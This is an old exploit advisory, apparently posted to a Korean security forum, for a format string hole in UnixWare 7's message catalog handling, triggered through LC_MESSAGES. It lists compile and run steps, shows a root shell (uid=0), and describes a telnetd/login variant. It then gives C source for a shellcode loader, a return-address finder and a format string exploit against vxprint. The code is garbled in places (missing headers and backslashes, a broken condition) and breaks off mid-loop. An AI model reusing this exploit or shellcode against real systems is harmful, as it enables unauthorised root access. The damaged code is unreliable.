This exploit is fixed already.
Crackers can modify message catalog and,
It can possible format string exploit.


$ gcc -o expshell expshell.c
$ gcc -o getret getret.c
$ gcc -o fmt_exp fmt_exp.c
$ ./expshell
$ ./getret
e=8047af7
$ ./fmt_exp 0x8047af7 16 ( 16 is offset )
...........(wait 30 minutes ). ......

# id
uid=0(root) gid=3(sys) ......................

This can exploit all of unixware 7 setuid/setgid
command.

Also, can exploit telnetd and login.

example)
$ telnet
telnet> env def LC_MESSAGES /tmp
telnet> o localhost
Trying....
.....
login: blah blah..
password: blah.. blash..
...... (wait 30 minutes.. )
#

------------------------------------------------
Korean security forum
http://www.forsecure.com
http://www.netemperor.com
------------------------------------------------

Here is code.

------------------ expshell.c ------------------
#include

char shellcode[]=
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90"
"xebx1a" /* jmp */
"x33xd2" /* xorl %edx,%edx */
"x58" /* popl %eax */
"x8dx78x14" /* leal 0x14(%eax),%edi */
"x57" /* pushl %edi */
"x50" /* pushl %eax */
"xab" /* stosl %eax,%es:(%edi) */
"x92" /* xchgl %eax,%edx */
"xab" /* stosl %eax,%es:(%edi) */
"x88x42x08" /* movb %al,0x8(%edx)
*/
"x83xefx3b" /* subl $0x3b,%edi */
"xb0x9a" /* movb $0x9a,%al */
"xab" /* stosl %eax,%es:(%edi) */
"x47" /* incl %edi */
"xb0x07" /* movb $0x07,%al */
"xab" /* stosl %eax,%es:(%edi) */
"xb0x0b" /* movb $0x0b,%al */
"xe8xe1xffxffxff" /* call */
"/bin/ksh"
;

main(int argc, char *argv[])
{
char buff[1024];

sprintf(buff, "EGG=%s", shellcode);
putenv(buff);

putenv("LC_MESSAGES=/tmp");
system("/usr/bin/tcsh");
}
---------------------------------------------------------------

---------------- getret.c --------------------
main()
{
char *a;
a = getenv("EGG");
printf ("e=%pn", a);
}
-----------------------------------------------

---------------- fmt_exp.c -----------------------------
#include
#include "shellcode.h"

/* This is base of format string return address */
/* Base address of vxprint is 0x20c7c(134268) */
#define BASE 134268

main(int argc, char *argv[])
{
FILE *fp;
char *retaddr;
long g_len, offset;
int count, count2, line=700, n=19;

if(argc 3) {
printf("Usage: %s ret-address offsetn", argv[0]);
exit(1);
}

retaddr = argv[1];
if(argc == 3) offset = atol(argv[2]);
else offset = 0;

g_len = strtol(retaddr, NULL, 16);
g_len -= BASE;
g_len += offset;

fp = fopen("testdef", "w+");
if(fp == NULL) {
fprintf(stderr, "can not open file.n"); exit(1);
}
for(count=0; count